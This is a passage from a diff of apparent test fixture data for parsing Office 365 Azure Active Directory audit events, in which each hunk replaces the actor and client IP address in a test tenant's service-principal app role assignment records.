APIs\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"b2484c3c-5461-43ab-850b-70fccf706796\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"5c242833-909c-4c6b-bca3-50feaaa98d23\\\",\\\"DisplayName\\\":\\\"siem\\\",\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\",\\\"Name\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-10T15:17:00.2133065Z\"},{\"Name\":\"env_epoch\",\"Value\":\"OLE3R\"},{\"Name\":\"env_seqNum\",\"Value\":\"55908041\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##53a69eec-6bcd-473f-9c68-150d680e0776_00000000-0000-0000-0000-000000000000_53a69eec-6bcd-473f-9c68-150d680e0776\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR551\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\
"Value\":\"R5\"}],\"Id\":\"7bca6665-4d58-4df9-bd34-4d92e1fc63aa\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"siem\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"OldValue\":\"\"}],\"ObjectId\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Operation\":\"Add a deletion-marked app role assignment grant to service principal as part of link removal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Office 365 Management APIs\",\"Type\":1},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\"Type\":2},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" }, "o365audit": { "Actor": [ 
@@ -10856,9 +10856,9 @@
 }
 ],
 "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
- "ActorIpAddress": "83.57.233.151",
+ "ActorIpAddress": "67.43.156.15",
 "AzureActiveDirectoryEventType": 1,
- "ClientIP": "83.57.233.151",
+ "ClientIP": "67.43.156.15",
 "CreationTime": "2020-02-10T15:17:00",
 "ExtendedProperties": [
 {
@@ -11092,7 +11092,7 @@ }, { "event": { - "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-10T15:17:00\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\"},{\"Name\":\"targetName\",\"Value\":\"Office 365 Management 
APIs\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"b2484c3c-5461-43ab-850b-70fccf706796\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"5c242833-909c-4c6b-bca3-50feaaa98d23\\\",\\\"DisplayName\\\":\\\"siem\\\",\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\",\\\"Name\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-10T15:17:00.2133065Z\"},{\"Name\":\"env_epoch\",\"Value\":\"OLE3R\"},{\"Name\":\"env_seqNum\",\"Value\":\"55908041\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##53a69eec-6bcd-473f-9c68-150d680e0776_00000000-0000-0000-0000-000000000000_53a69eec-6bcd-473f-9c68-150d680e0776\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR551\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\
"Value\":\"R5\"}],\"Id\":\"7bca6665-4d58-4df9-bd34-4d92e1fc63aa\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"siem\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"OldValue\":\"\"}],\"ObjectId\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Operation\":\"Add a deletion-marked app role assignment grant to service principal as part of link removal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Office 365 Management APIs\",\"Type\":1},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\"Type\":2},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" + "original": 
"{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-10T15:17:00\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\"},{\"Name\":\"targetName\",\"Value\":\"Office 365 Management 
APIs\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"b2484c3c-5461-43ab-850b-70fccf706796\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"5c242833-909c-4c6b-bca3-50feaaa98d23\\\",\\\"DisplayName\\\":\\\"siem\\\",\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\",\\\"Name\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-10T15:17:00.2133065Z\"},{\"Name\":\"env_epoch\",\"Value\":\"OLE3R\"},{\"Name\":\"env_seqNum\",\"Value\":\"55908041\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##53a69eec-6bcd-473f-9c68-150d680e0776_00000000-0000-0000-0000-000000000000_53a69eec-6bcd-473f-9c68-150d680e0776\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR551\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\
"Value\":\"R5\"}],\"Id\":\"7bca6665-4d58-4df9-bd34-4d92e1fc63aa\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"siem\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"OldValue\":\"\"}],\"ObjectId\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Operation\":\"Add a deletion-marked app role assignment grant to service principal as part of link removal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Office 365 Management APIs\",\"Type\":1},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\"Type\":2},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" }, "o365audit": { "Actor": [ 
@@ -11122,9 +11122,9 @@
 }
 ],
 "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
- "ActorIpAddress": "83.57.233.151",
+ "ActorIpAddress": "67.43.156.15",
 "AzureActiveDirectoryEventType": 1,
- "ClientIP": "83.57.233.151",
+ "ClientIP": "67.43.156.15",
 "CreationTime": "2020-02-10T15:17:00",
 "ExtendedProperties": [
 {
@@ -11358,7 +11358,7 @@ }, { "event": { - "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-10T15:17:45\",\"ExtendedProperties\":[{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\"},{\"Name\":\"targetName\",\"Value\":\"Office 365 Management 
APIs\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"2f79971d-1802-40d2-b048-6cf4f85c010b\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"5c242833-909c-4c6b-bca3-50feaaa98d23\\\",\\\"DisplayName\\\":\\\"siem\\\",\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\",\\\"Name\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-10T15:17:45.3474390Z\"},{\"Name\":\"env_epoch\",\"Value\":\"95CEL\"},{\"Name\":\"env_seqNum\",\"Value\":\"44735117\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##7680db8f-eddb-4082-952a-0a3cfafd117c_00000000-0000-0000-0000-000000000000_7680db8f-eddb-4082-952a-0a3cfafd117c\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.
0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR519\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"227bc85c-0c21-4df3-9e11-3a24f104e1e4\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"siem\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"OldValue\":\"\"}],\"ObjectId\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Operation\":\"Remove app role assignment from service principal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Office 365 Management 
APIs\",\"Type\":1},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\"Type\":2},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" + "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-10T15:17:45\",\"ExtendedProperties\":[{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\"},{\"Name\":\"targetName\",\"Value\":\"Office 365 
Management APIs\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"2f79971d-1802-40d2-b048-6cf4f85c010b\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"5c242833-909c-4c6b-bca3-50feaaa98d23\\\",\\\"DisplayName\\\":\\\"siem\\\",\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\",\\\"Name\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 